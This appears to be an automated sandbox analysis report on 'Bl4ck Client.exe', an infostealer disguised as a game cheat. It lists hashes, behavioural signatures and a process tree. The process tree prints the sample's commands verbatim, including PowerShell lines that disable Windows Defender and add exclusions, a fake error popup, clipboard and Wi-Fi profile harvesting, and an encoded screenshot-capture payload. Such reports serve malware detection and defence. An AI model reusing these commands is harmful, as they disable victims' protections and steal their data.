Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
28-05-2024 16:56
Behavioral task
behavioral1
Sample
Bl4ck Client.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Bl4ck Client.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral3
Sample
��~�K�.pyc
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
��~�K�.pyc
Resource
win10v2004-20240426-en
General
-
Target
Bl4ck Client.exe
-
Size
6.0MB
-
MD5
4861a568eb379fcd43b5a0db6994f9e2
-
SHA1
4a02f9bc5be0fe193c4d71be4d89553b56a1222f
-
SHA256
af479e34de20aa19a1214d21b9a3c1083b4d37ab1479022df49b4ce06d57938a
-
SHA512
0fb058fcab917d4742fcaa72af6c33594bd088a86e41d76e402b807851c30ab7eea940de2a895b6c6db48933b51ad84628ab56937c9796fb78fbc128132b623c
-
SSDEEP
98304:TrSrEtdFBCwAamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4R0OuAKsXw3Dw:TrSCFIwBeN/FJMIDJf0gsAGK4RXuAKsh
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepowershell.exepid process 3388 powershell.exe 3384 powershell.exe 3084 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
Bl4ck Client.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts Bl4ck Client.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Executes dropped EXE 1 IoCs
Processes:
rar.exepid process 2720 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
Bl4ck Client.exepid process 3620 Bl4ck Client.exe 3620 Bl4ck Client.exe 3620 Bl4ck Client.exe 3620 Bl4ck Client.exe 3620 Bl4ck Client.exe 3620 Bl4ck Client.exe 3620 Bl4ck Client.exe 3620 Bl4ck Client.exe 3620 Bl4ck Client.exe 3620 Bl4ck Client.exe 3620 Bl4ck Client.exe 3620 Bl4ck Client.exe 3620 Bl4ck Client.exe 3620 Bl4ck Client.exe 3620 Bl4ck Client.exe 3620 Bl4ck Client.exe 3620 Bl4ck Client.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI30122\python310.dll upx behavioral2/memory/3620-25-0x00007FFC7C5E0000-0x00007FFC7CA4E000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI30122\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI30122\libffi-7.dll upx behavioral2/memory/3620-47-0x00007FFC8F330000-0x00007FFC8F354000-memory.dmp upx behavioral2/memory/3620-48-0x00007FFC95400000-0x00007FFC9540F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI30122\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI30122\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI30122\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI30122\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI30122\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI30122\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI30122\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI30122\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI30122\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI30122\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI30122\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI30122\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI30122\libcrypto-1_1.dll upx behavioral2/memory/3620-54-0x00007FFC8C500000-0x00007FFC8C52D000-memory.dmp upx behavioral2/memory/3620-56-0x00007FFC919E0000-0x00007FFC919F9000-memory.dmp upx behavioral2/memory/3620-58-0x00007FFC8F2E0000-0x00007FFC8F2FF000-memory.dmp upx behavioral2/memory/3620-60-0x00007FFC7C460000-0x00007FFC7C5D1000-memory.dmp upx behavioral2/memory/3620-62-0x00007FFC8BE60000-0x00007FFC8BE79000-memory.dmp upx behavioral2/memory/3620-64-0x00007FFC90380000-0x00007FFC9038D000-memory.dmp upx behavioral2/memory/3620-66-0x00007FFC8BE30000-0x00007FFC8BE5E000-memory.dmp upx behavioral2/memory/3620-68-0x00007FFC8BAA0000-0x00007FFC8BB58000-memory.dmp upx behavioral2/memory/3620-71-0x00007FFC7C5E0000-0x00007FFC7CA4E000-memory.dmp upx behavioral2/memory/3620-78-0x00007FFC8BD60000-0x00007FFC8BD74000-memory.dmp upx behavioral2/memory/3620-80-0x00007FFC8B790000-0x00007FFC8B8A8000-memory.dmp upx behavioral2/memory/3620-77-0x00007FFC8F330000-0x00007FFC8F354000-memory.dmp upx behavioral2/memory/3620-76-0x00007FFC901C0000-0x00007FFC901CD000-memory.dmp upx behavioral2/memory/3620-74-0x00007FFC7C0E0000-0x00007FFC7C455000-memory.dmp upx behavioral2/memory/3620-194-0x00007FFC919E0000-0x00007FFC919F9000-memory.dmp upx behavioral2/memory/3620-237-0x00007FFC8F2E0000-0x00007FFC8F2FF000-memory.dmp upx behavioral2/memory/3620-255-0x00007FFC7C460000-0x00007FFC7C5D1000-memory.dmp upx behavioral2/memory/3620-285-0x00007FFC8BE30000-0x00007FFC8BE5E000-memory.dmp upx behavioral2/memory/3620-291-0x00007FFC8BE60000-0x00007FFC8BE79000-memory.dmp upx behavioral2/memory/3620-287-0x00007FFC7C0E0000-0x00007FFC7C455000-memory.dmp upx behavioral2/memory/3620-286-0x00007FFC8BAA0000-0x00007FFC8BB58000-memory.dmp upx behavioral2/memory/3620-281-0x00007FFC8F2E0000-0x00007FFC8F2FF000-memory.dmp upx behavioral2/memory/3620-276-0x00007FFC7C5E0000-0x00007FFC7CA4E000-memory.dmp upx behavioral2/memory/3620-277-0x00007FFC8F330000-0x00007FFC8F354000-memory.dmp upx behavioral2/memory/3620-290-0x00007FFC8B790000-0x00007FFC8B8A8000-memory.dmp upx behavioral2/memory/3620-292-0x00007FFC7C5E0000-0x00007FFC7CA4E000-memory.dmp upx behavioral2/memory/3620-308-0x00007FFC7C5E0000-0x00007FFC7CA4E000-memory.dmp upx behavioral2/memory/3620-319-0x00007FFC7C0E0000-0x00007FFC7C455000-memory.dmp upx behavioral2/memory/3620-334-0x00007FFC901C0000-0x00007FFC901CD000-memory.dmp upx behavioral2/memory/3620-333-0x00007FFC8BD60000-0x00007FFC8BD74000-memory.dmp upx behavioral2/memory/3620-332-0x00007FFC8BAA0000-0x00007FFC8BB58000-memory.dmp upx behavioral2/memory/3620-331-0x00007FFC8BE30000-0x00007FFC8BE5E000-memory.dmp upx behavioral2/memory/3620-330-0x00007FFC90380000-0x00007FFC9038D000-memory.dmp upx behavioral2/memory/3620-329-0x00007FFC8BE60000-0x00007FFC8BE79000-memory.dmp upx behavioral2/memory/3620-328-0x00007FFC7C460000-0x00007FFC7C5D1000-memory.dmp upx behavioral2/memory/3620-327-0x00007FFC8F2E0000-0x00007FFC8F2FF000-memory.dmp upx behavioral2/memory/3620-326-0x00007FFC919E0000-0x00007FFC919F9000-memory.dmp upx behavioral2/memory/3620-325-0x00007FFC8C500000-0x00007FFC8C52D000-memory.dmp upx behavioral2/memory/3620-324-0x00007FFC95400000-0x00007FFC9540F000-memory.dmp upx behavioral2/memory/3620-322-0x00007FFC8B790000-0x00007FFC8B8A8000-memory.dmp upx behavioral2/memory/3620-323-0x00007FFC8F330000-0x00007FFC8F354000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 8 ip-api.com 21 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid process 3672 WMIC.exe 3180 WMIC.exe 4524 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 5 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 2292 tasklist.exe 2940 tasklist.exe 1192 tasklist.exe 916 tasklist.exe 2124 tasklist.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Opens file in notepad (likely ransom note) 2 IoCs
Processes:
NOTEPAD.EXENOTEPAD.EXEpid process 4804 NOTEPAD.EXE 4016 NOTEPAD.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exemsedge.exemsedge.exeidentity_helper.exepid process 3384 powershell.exe 5040 powershell.exe 5040 powershell.exe 3384 powershell.exe 3384 powershell.exe 5040 powershell.exe 3084 powershell.exe 3084 powershell.exe 2308 powershell.exe 2308 powershell.exe 2308 powershell.exe 3388 powershell.exe 3388 powershell.exe 3388 powershell.exe 3188 powershell.exe 3188 powershell.exe 2408 powershell.exe 2408 powershell.exe 3760 msedge.exe 3760 msedge.exe 1424 msedge.exe 1424 msedge.exe 4492 identity_helper.exe 4492 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
Processes:
msedge.exepid process 1424 msedge.exe 1424 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exeWMIC.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 1192 tasklist.exe Token: SeIncreaseQuotaPrivilege 5080 WMIC.exe Token: SeSecurityPrivilege 5080 WMIC.exe Token: SeTakeOwnershipPrivilege 5080 WMIC.exe Token: SeLoadDriverPrivilege 5080 WMIC.exe Token: SeSystemProfilePrivilege 5080 WMIC.exe Token: SeSystemtimePrivilege 5080 WMIC.exe Token: SeProfSingleProcessPrivilege 5080 WMIC.exe Token: SeIncBasePriorityPrivilege 5080 WMIC.exe Token: SeCreatePagefilePrivilege 5080 WMIC.exe Token: SeBackupPrivilege 5080 WMIC.exe Token: SeRestorePrivilege 5080 WMIC.exe Token: SeShutdownPrivilege 5080 WMIC.exe Token: SeDebugPrivilege 5080 WMIC.exe Token: SeSystemEnvironmentPrivilege 5080 WMIC.exe Token: SeRemoteShutdownPrivilege 5080 WMIC.exe Token: SeUndockPrivilege 5080 WMIC.exe Token: SeManageVolumePrivilege 5080 WMIC.exe Token: 33 5080 WMIC.exe Token: 34 5080 WMIC.exe Token: 35 5080 WMIC.exe Token: 36 5080 WMIC.exe Token: SeDebugPrivilege 3384 powershell.exe Token: SeDebugPrivilege 5040 powershell.exe Token: SeIncreaseQuotaPrivilege 5080 WMIC.exe Token: SeSecurityPrivilege 5080 WMIC.exe Token: SeTakeOwnershipPrivilege 5080 WMIC.exe Token: SeLoadDriverPrivilege 5080 WMIC.exe Token: SeSystemProfilePrivilege 5080 WMIC.exe Token: SeSystemtimePrivilege 5080 WMIC.exe Token: SeProfSingleProcessPrivilege 5080 WMIC.exe Token: SeIncBasePriorityPrivilege 5080 WMIC.exe Token: SeCreatePagefilePrivilege 5080 WMIC.exe Token: SeBackupPrivilege 5080 WMIC.exe Token: SeRestorePrivilege 5080 WMIC.exe Token: SeShutdownPrivilege 5080 WMIC.exe Token: SeDebugPrivilege 5080 WMIC.exe Token: SeSystemEnvironmentPrivilege 5080 WMIC.exe Token: SeRemoteShutdownPrivilege 5080 WMIC.exe Token: SeUndockPrivilege 5080 WMIC.exe Token: SeManageVolumePrivilege 5080 WMIC.exe Token: 33 5080 WMIC.exe Token: 34 5080 WMIC.exe Token: 35 5080 WMIC.exe Token: 36 5080 WMIC.exe Token: SeIncreaseQuotaPrivilege 3672 WMIC.exe Token: SeSecurityPrivilege 3672 WMIC.exe Token: SeTakeOwnershipPrivilege 3672 WMIC.exe Token: SeLoadDriverPrivilege 3672 WMIC.exe Token: SeSystemProfilePrivilege 3672 WMIC.exe Token: SeSystemtimePrivilege 3672 WMIC.exe Token: SeProfSingleProcessPrivilege 3672 WMIC.exe Token: SeIncBasePriorityPrivilege 3672 WMIC.exe Token: SeCreatePagefilePrivilege 3672 WMIC.exe Token: SeBackupPrivilege 3672 WMIC.exe Token: SeRestorePrivilege 3672 WMIC.exe Token: SeShutdownPrivilege 3672 WMIC.exe Token: SeDebugPrivilege 3672 WMIC.exe Token: SeSystemEnvironmentPrivilege 3672 WMIC.exe Token: SeRemoteShutdownPrivilege 3672 WMIC.exe Token: SeUndockPrivilege 3672 WMIC.exe Token: SeManageVolumePrivilege 3672 WMIC.exe Token: 33 3672 WMIC.exe Token: 34 3672 WMIC.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
Processes:
msedge.exepid process 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe 1424 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Bl4ck Client.exeBl4ck Client.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3012 wrote to memory of 3620 3012 Bl4ck Client.exe Bl4ck Client.exe PID 3012 wrote to memory of 3620 3012 Bl4ck Client.exe Bl4ck Client.exe PID 3620 wrote to memory of 756 3620 Bl4ck Client.exe cmd.exe PID 3620 wrote to memory of 756 3620 Bl4ck Client.exe cmd.exe PID 3620 wrote to memory of 1516 3620 Bl4ck Client.exe cmd.exe PID 3620 wrote to memory of 1516 3620 Bl4ck Client.exe cmd.exe PID 3620 wrote to memory of 1484 3620 Bl4ck Client.exe cmd.exe PID 3620 wrote to memory of 1484 3620 Bl4ck Client.exe cmd.exe PID 3620 wrote to memory of 4292 3620 Bl4ck Client.exe cmd.exe PID 3620 wrote to memory of 4292 3620 Bl4ck Client.exe cmd.exe PID 3620 wrote to memory of 2984 3620 Bl4ck Client.exe cmd.exe PID 3620 wrote to memory of 2984 3620 Bl4ck Client.exe cmd.exe PID 4292 wrote to memory of 1192 4292 cmd.exe tasklist.exe PID 4292 wrote to memory of 1192 4292 cmd.exe tasklist.exe PID 2984 wrote to memory of 5080 2984 cmd.exe WMIC.exe PID 2984 wrote to memory of 5080 2984 cmd.exe WMIC.exe PID 1484 wrote to memory of 1572 1484 cmd.exe mshta.exe PID 1484 wrote to memory of 1572 1484 cmd.exe mshta.exe PID 756 wrote to memory of 3384 756 cmd.exe powershell.exe PID 756 wrote to memory of 3384 756 cmd.exe powershell.exe PID 1516 wrote to memory of 5040 1516 cmd.exe powershell.exe PID 1516 wrote to memory of 5040 1516 cmd.exe powershell.exe PID 3620 wrote to memory of 1436 3620 Bl4ck Client.exe cmd.exe PID 3620 wrote to memory of 1436 3620 Bl4ck Client.exe cmd.exe PID 1436 wrote to memory of 2472 1436 cmd.exe reg.exe PID 1436 wrote to memory of 2472 1436 cmd.exe reg.exe PID 3620 wrote to memory of 1856 3620 Bl4ck Client.exe cmd.exe PID 3620 wrote to memory of 1856 3620 Bl4ck Client.exe cmd.exe PID 1856 wrote to memory of 4456 1856 cmd.exe reg.exe PID 1856 wrote to memory of 4456 1856 cmd.exe reg.exe PID 3620 wrote to memory of 3264 3620 Bl4ck Client.exe tree.com PID 3620 wrote to memory of 3264 3620 Bl4ck Client.exe tree.com PID 3264 wrote to memory of 3672 3264 cmd.exe WMIC.exe PID 3264 wrote to memory of 3672 3264 cmd.exe WMIC.exe PID 3620 wrote to memory of 4684 3620 Bl4ck Client.exe cmd.exe PID 3620 wrote to memory of 4684 3620 Bl4ck Client.exe cmd.exe PID 4684 wrote to memory of 3180 4684 cmd.exe WMIC.exe PID 4684 wrote to memory of 3180 4684 cmd.exe WMIC.exe PID 3620 wrote to memory of 4848 3620 Bl4ck Client.exe cmd.exe PID 3620 wrote to memory of 4848 3620 Bl4ck Client.exe cmd.exe PID 3620 wrote to memory of 552 3620 Bl4ck Client.exe cmd.exe PID 3620 wrote to memory of 552 3620 Bl4ck Client.exe cmd.exe PID 4848 wrote to memory of 2016 4848 cmd.exe attrib.exe PID 4848 wrote to memory of 2016 4848 cmd.exe attrib.exe PID 552 wrote to memory of 3084 552 cmd.exe powershell.exe PID 552 wrote to memory of 3084 552 cmd.exe powershell.exe PID 3620 wrote to memory of 5052 3620 Bl4ck Client.exe cmd.exe PID 3620 wrote to memory of 5052 3620 Bl4ck Client.exe cmd.exe PID 3620 wrote to memory of 3716 3620 Bl4ck Client.exe cmd.exe PID 3620 wrote to memory of 3716 3620 Bl4ck Client.exe cmd.exe PID 5052 wrote to memory of 916 5052 cmd.exe tasklist.exe PID 5052 wrote to memory of 916 5052 cmd.exe tasklist.exe PID 3716 wrote to memory of 2124 3716 cmd.exe tasklist.exe PID 3716 wrote to memory of 2124 3716 cmd.exe tasklist.exe PID 3620 wrote to memory of 2608 3620 Bl4ck Client.exe csc.exe PID 3620 wrote to memory of 2608 3620 Bl4ck Client.exe csc.exe PID 3620 wrote to memory of 4104 3620 Bl4ck Client.exe cmd.exe PID 3620 wrote to memory of 4104 3620 Bl4ck Client.exe cmd.exe PID 2608 wrote to memory of 1172 2608 cmd.exe WMIC.exe PID 2608 wrote to memory of 1172 2608 cmd.exe WMIC.exe PID 4104 wrote to memory of 2308 4104 cmd.exe powershell.exe PID 4104 wrote to memory of 2308 4104 cmd.exe powershell.exe PID 3620 wrote to memory of 1660 3620 Bl4ck Client.exe cmd.exe PID 3620 wrote to memory of 1660 3620 Bl4ck Client.exe cmd.exe -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 4404 attrib.exe 2016 attrib.exe 3048 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Bl4ck Client.exe"C:\Users\Admin\AppData\Local\Temp\Bl4ck Client.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Users\Admin\AppData\Local\Temp\Bl4ck Client.exe"C:\Users\Admin\AppData\Local\Temp\Bl4ck Client.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Bl4ck Client.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Bl4ck Client.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3384 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5040 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please contact the owner to get a new one', 0, 'The cheat is outdated', 48+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please contact the owner to get a new one', 0, 'The cheat is outdated', 48+16);close()"4⤵PID:1572
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4292 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1192 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5080 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:2472
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:4456
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3264 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:3672 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4684 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3180 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Bl4ck Client.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Bl4ck Client.exe"4⤵
- Views/modifies file attributes
PID:2016 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3084 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:916 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2124 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:1172
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2308 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1660
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2292 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:820
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3264
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵PID:2728
-
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵PID:440
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:4372
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:1564 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:3856
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:1036
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4A